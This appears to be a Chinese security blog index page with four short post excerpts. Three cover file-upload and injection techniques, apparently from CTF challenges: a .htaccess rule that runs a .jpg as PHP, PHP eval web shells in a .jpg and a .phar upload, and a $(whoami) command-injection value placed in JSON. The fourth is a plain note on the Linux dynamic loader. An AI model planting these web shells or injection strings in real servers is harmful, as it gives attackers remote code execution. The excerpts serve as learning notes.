摘要：一、.htaccess文件上传方法一： FileMatch 参数即为文件名的正则匹配<FilesMatch "1.jpg"> SetHandler application/x-httpd-php</FilesMatch>// 1.jpg<?php eval($_GET['a']);?> 方法二：Ad 阅读全文

摘要：动态库链接器/加载器 当需要动态链接的应用被操作系统加载时 系统必须要定位然后加载它所需要的所有动态库文件 在Linux环境下，这项工作是由ld-linux.so.2来负责完成的 执行操作时操作系统会将控制权交给 ld-linux.so 而不是交给程序正常的进入地址 ld-linux.so.2 会寻 阅读全文

摘要：第一种解法： 上传个1.phar，文件内容为<?php @eval($REQUEST[8]);?> 第二种解法： 利用spl_autoload_register的特性 具体用法如下： <?php spl_autoloader_register(); $demo=new FXXK(); ?> 如果本文 阅读全文

摘要：简言之，就是抓包，修改json里的数据，写个$(whoami)/mskiss 能命令执行 去查了一下，$(whoami)就是可以命令执行，效果和反引号一样。 阅读全文